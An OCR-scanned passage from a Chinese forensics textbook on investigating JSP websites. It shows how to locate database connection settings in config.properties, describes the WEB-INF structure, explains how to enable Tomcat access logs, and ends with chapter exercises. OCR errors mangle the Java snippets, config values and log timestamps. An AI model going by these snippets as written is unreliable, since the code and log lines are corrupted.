中 一 个 非常 重要 的 步骤 就 是 如 图 6-13 中 设置 正确 的 数据 库 服务 器 IP .端口 号 .数据 库 名 
称 、 数 据 库 连接 用 户 名 及 密码 等 信息 ,用户 单 击 “ 确 定 ” 按 钮 后 ,安装 系统 必定 会 将 该 信息 
固定 保存 在 后 台 服 务 器 的 某 个 文件 内 ,后 面 所 有 的 数据 库 操作 (安装 、 查 询 、 更 新 及 插入 
等 ) 都 会 先 调用 该 数据 库 配置 信息 。 

在 对 网 站 调查 时 ,首先 要 在 网 站 主 目录 内 查找 存 有 数据 库 连接 参数 的 配置 文件 ,通过 
该 文件 内 容 即 可 快速 定位 对 应 的 后 台数 据 库 。 在 本 例 中 ,通过 实际 操作 发 现在 安装 过 程 
中 设置 数据 库 连 接 参 数 的 页 面 请 求 地 址 为 http://192. 168. 111. 128/install/install_ 
config.jsp, 在 192. 168. 111. 128 服务 器 内 找到 该 文件 ,对 代码 进行 分 析 , 找 到 如 图 6-20 
所 示 的 代码 段 。 


string msg = "li> 请 在 下 面 填写 您 的 数据 库 账号 信息 ， 通 常情 况 下 不 需要 修改 红色 选项 内 容 。x/1i>"; 

Properties prop=(Properties)request .getAttribute("prop"); 

if(request.getParameter("saueconfig'")*=null) 

《 
prop.setProperty("dbhost",request .getParameter("dbhost")); 
prop.setProperty("dbport",request .getParameter ("dbport")); 
prop.setProperty("dbuser",request .getParameter("dbuser™")); 
prop-.setProperty("dbpw",request .getParameter ("dbpw")); 
prop.setProperty("dbname",request .getParameter ("dbname™")); 
prop.setProperty("adminemail",request .getParameter("adminemail")); 
prop.setProperty("tablepre”",request .getParameter("tablepre™”)); 


图 6-20 install_config. jsp 文件 代码 段 1 


表明 该 文件 将 用 户 所 设置 的 数据 库 连接 参数 保存 在 连接 文件 中 ,在 该 文件 的 后 面 如 
图 6-21 所 示 的 代码 段 中 找到 配置 文件 为 网 站 主 目录 下 的 config. properties 文件 。 


if(twrite error) 《 
Config localConfig=new Config(request.getSession().getServletContext().getRealPath("/") 
+"fconfig.properties"); 
localConfig.setProperties(prop); 
localConfig.saveProperties("Config Info™); 


图 6-21 install_config. jsp 文件 代码 段 2 
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打开 config. properties 文件 如 图 6-22 所 示 ,可 见 重要 的 数据 库 连 接 参数 信息 。 


dbhost=192.168.111.128 
dbname=jsprun 
charset=gbk 
dbport=3386 
tablepre=jrun_ 


tplrefresh=1 
dbuser=root 


图 6-22 ”config. properties 文件 内 容 


在 调查 网 站 时 ,用 户 通常 在 安装 完 网 站 系统 后 会 删除 相应 的 install 文件 夹 , 也 就 是 
不 能 根据 install_config. jsp 文件 源 代码 进行 逆向 解析 ,这 时 可 根据 JSP 程序 员 编 程 习惯 ， 
即 配置 文件 的 扩展 名 通常 为 properties 或 prop, 可 在 网 站 源码 主 目录 下 搜索 该 类 文件 ,再 
逐一 进行 排查 ,如 图 6-23 所 示 。 


=|Gixl 
文件 EE 编辑 EE) 查看 WD 收藏 和 ) 工具 GD) 帮助 00 
地 址 加 ) [器 搜索 结果 习 贺 痢 
搜索 助理 X 
| <onfig properties Crun 
近来 而 任 注 吉 所 有 亲 件 进行 加 |[B)log4jl. properties C:\jrun\WEB-INF\classes 
搜索 - 
全 部 或 部 分 文件 名 (O); 
文件 中 的 一 个 宇 或 词组 (ww); 
查找 范围 (D; 
Dm 时 
4 加 
找到 2 个 文件 % 


图 6-23 配置 文件 搜索 结果 


643 JSP 网 站 目录 结构 


1. 客户 浏览 器 可 见 文件 
静态 和 动态 页 面 文件 以 及 其 他 所 有 对 于 客户 浏览 器 可 以 见 的 文件 (包括 图 片 、 
JavaScript 脚本 文件 .CSS 样式 表 文 件 JSP 及 HTML 等 ) 可 以 都 放置 在 根 目 录 下 。 对 于 
较 大 的 JSP 应 用 程序 ,通常 在 根 目录 下 建立 更 为 复杂 的 目录 层次 结构 。 对 于 简单 的 应 用 
程序 则 完全 可 以 将 这 些 文件 放 在 根 目录 下 。 
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2. Meb-INF 文件 夹 
Web-INF 文件 夹 是 一 个 非常 安全 的 文件 ,在 页 面 中 不 能 直接 访问 其 中 的 文件 ,必须 
通过 Web. xml 文件 对 要 访问 的 文件 进行 相应 映射 才能 访问 。 
。 /Web-INF/Web. xml: Web. xml 文件 用 于 配置 Web 程序 ,被 称 为 Web 应 用 程序 
部 署 描述 器 (Web Application Deployment Desicription)。 它 是 一 个 用 来 描述 
Servlet 和 其 他 Web 应 用 程序 组 成 部 分 以 及 它们 的 初始 参数 等 属性 的 XML 
文档 。 
。 /Web-INF/classes: 这 个 子 目 录用 于 存储 所 有 Java 类 文件 和 相关 资源 文件 ,如 图 
片 .语言 信息 等 。 这 些 类 文件 可 能 是 Servlet, 也 可 能 是 普通 的 Java 类 。 需 要 注意 
的 是 ,如 果 一 个 类 文件 属于 某 个 包 (package) , 则 需要 将 整个 目录 层次 结构 放置 于 
classes 目录 下 。 
。 /Web-INF/lib: 该 子 目录 用 于 存放 Web 应 用 程序 所 需 的 所 有 库 文件 ,这 些 库 文件 
是 以 压缩 的 jar 文件 格式 存储 的 , 它 包含 所 有 Web 应 用 程序 所 需 的 类 文件 和 相应 
的 资源 文件 。 例 如 ,一 个 电子 商务 应 用 需要 访问 Oracle, 就 需要 将 要 使 用 的 JDBC 
驱动 程序 库 文件 都 放置 于 lib 目录 下 。 
另外 值得 注意 的 是 对 应 关系 , 若 Web. xml 文件 中 定义 了 “过 servlet-class 记 com. 
professional. HelloWorldServlet 一 /servlet-class 二 ”, 则 在 HelloWorldServlet. java 文件 
中 ,应 该 有 “package com. professional”; 且 此 时 应 该 将 HelloWorldServlet. java 和 编译 后 
得 到 的 HelloWorldServlet. class 文件 放 在 *C:\Tomcat\Webapps\jsp\Web-INF\classes\ 
com\professional\” 下 面 。 


644 Tonrcat 日 志 分 析 


启用 访问 日 志 记录 功能 

Tomcat 默认 不 记录 访问 日 志 , 需 要 进行 如 下 设置 来 启用 访问 日 志 de 

将 $CATALINA_HOME/conf/server. xml 中 二 Valve className 一 "org. apache. 
catalina. valves. FastCommonAccessLogValve" directory= "logs" prefix= "localhost_ 
access_log. " suffix=".txt" pattern 二 "common" resolveHosts 王 "false" /全 的 注释 去 掉 。 

其 中 ,directory 指令 设置 了 访问 日 志 的 目录 ,为 Tomcat 安装 目录 下 的 logs 文件 来 
内 ,文件 名 前 级 为 localhost_access_log ,后缀 为 txt。 访 问 日 志 格 式 为 common, 其 对 应 为 
“%h %1 %u %t %r %s %b”, 具 体 字段 请 参考 Apache 日 志 格 式 说 明 。 

2. 重新 启动 tomcat。 

访问 网 站 ,在 后 台 服 务 器 C:\apache-tomcat-5. 5. 31\logs 文件 夹 内 可 找到 localhost_ 
access_log. 2012-05-02. txt 文件 ,访问 日 志 内 容 如 图 6-24 所 示 。 

Tomcat 访问 日 志 的 具体 分 析 方法 参见 5. 5. 2 节 pache 日 志 分 析 部 分 ,对 JSP 网 站 
的 数据 访问 痕迹 追查 分 析 参 见 ASP、PHP 网 站 的 敏感 信息 追查 方法 。 
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转 1ocalhost_access_log.2012-05-02. txt - 记事 本 =l9olx| 
文件 FE) 编辑 到 ) 格式 名) 查看 帮助 0 

192.168.111.1 - - [92/May/2812:11:16:89 +9899] "GET /Forundata/cache/style 1 append.css HTTP/1.-2 
192.168.111.1 - - [92/May/2812:11:16:89 +8899] “GET /include/javascript/connon.js HTTP/1.1" 384 
192.168.111.1 - - [92/May/2812: : “GET /include/javascript/menu.js HTTP/1.1" 384 - 
192.168.111.1 - - : “POST /post.jsp?action=reply&fid=3&tid=1&replysut 
192.168.111.1 - - “GET /include/javascript/ajax.js HTTP/1.1" 384 — 
192.168.111.1 - - “GET /images/default/menu_bg-gif HTTP/1-1 384 - 
192.168.111.1 - - [92/May/2812:11: ET /inages/default/arrow down.gif HTTP/1.1" 38! 
192.168.111.1 - - [92/May/2812: ET /imagesydefault/10go-gif HTTP/1.1" 384 - 
192.168.111.1 - - [92/May/2812: GET /inages/default/portalbox_bg.gif HTTP/1.1" ¢ 
192.168.111.1 - - [92/May/2812: : "GET /inages/default/jsprun_icon.gif HTTP/1.1" 31 
192.168.111.1 - - [82/May/2812:11: ”GET /inages/default/nenu_ itenline.gif HTTP/1.1" 
192.168.111.1 - - [92/May/2812: ET /forundata/cache/snilies_var .js?9.2758598051! 
192.168.111.1 - - ET /post-jsp?action=neuthread&fid=3&page=1 HTTE 
192.168.111.1 - - GET /Forundata/cache/style_1.css HTTP/1.1" 364 - 
192.168.111.1 - - "GET /Forumdata/cache/style_1_append.css HTTP/1.- 
192.168.111.1 - - [92/May/2812:11:16:29 +8899] “GET /include/javascript/connon.js HTTP/1.1" 384 
192.168.111.1 - - [92/May/2812:11:16:29 *9898] “GET /include/javascript/menu.js HTTP/1.1" 384 - 。 
4 莫 


图 6-24 ” Tomcat 访问 日 志 内 容 


习 题 6 


1. 选 择 题 
(1) JSP 网 页 在 传统 的 网 页 HTML 文件 中 加 入 ( Ys 


A. Java 程序 片段 B. JSP 标记 C. JavaScript D. CSS 
(2) JSP 网 站 中 常见 的 文件 扩展 名 有 (  ” )。 
A. jsp B. class C. js D. xml 


(3) JSP 文 件 的 执行 方式 是 ( 
A. 编译 式 B. 解释 式 C. 编译 解释 式 。 D. 汇编 式 
(4) 构建 JSP 网 站 运行 平台 需要 安装 ( ) 软 件 。 


A. Tomcat B. MySQL 数据 库 

C. JDK D. Java 编译 器 
(5) JDK 是 整个 Java 的 核心 ,包括 ( ji 

A. Java 运行 环境 B. Java 工具 

C. Java 基础 的 类 库 D. Java Servlet 


(6) 在 JSP 网 站 运行 平台 中 ,Tomcat 起 到 ( ) 作 用 。 

A. Web 服务 器 B. 应 用 服务 器 

C. 数据 库 服务 器 D. 解释 执行 JSP 代码 
(7) Tomcat 的 主要 配置 文件 是 ( $s 


A. tomcat-users. xml B. configue. xml C. web. xml D. server. xml 
(8) MySQL 数据 库 的 配置 文件 是 ( 7 
A. my. ini B. mysql. conf C. my. xml D. my. info 
(9) 在 “一 context path 一 "/ " docBase 二 "C:\system" /全 ”标签 中 ,docBase 属性 值 
表示 ( Ys 
A. Tomcat 安装 目录 B. 网 站 主 目录 
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C. 配置 文件 目录 D. 系统 文件 目录 


(10) 在 “二 Valve className 一 "org. apache. catalina. valves. FastCommonAccess- 


LogValve"directory= "logs" prefix= "localhost_access_log." suffix=". txt”pattern 一 
"common" resolveHosts 王 "false"/ 盖 ”标签 中 prefix 属性 值 表示 ( 和 
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A. 日 志文 件 目录 B. 日 志文 件 名 称 
C. 日 志文 件 扩展 名 D. 系统 文件 名 称 
2. 问答 题 


(1) JSP 网 站 与 之 前 的 ASP 和 PHP 网 站 有 何不 同 ? 

(2) 请 阐述 JSP 页 面 的 执行 过 程 。 

(3) 请 说 明 如 何 通 过 Tomcat 发 布 JSP 网 站 ? 

(4) 如 何在 后 台 MySQL 数据 库 服 务 器 内 找到 MySQL 数据 库 文件 ? 
(5) 请 说 明 如 何在 Tomcat 网 站 服务 器 中 快速 定位 网 站 访问 日 志文 件 。 
(6) 请 说 明 JSP 网 站 主 目录 下 /Web-INF 子 目录 下 的 关键 文件 信息 。 
(7) 请 说 明 系 统 内 安装 Tomat 软件 后 所 生成 的 目录 结构 信息 。 
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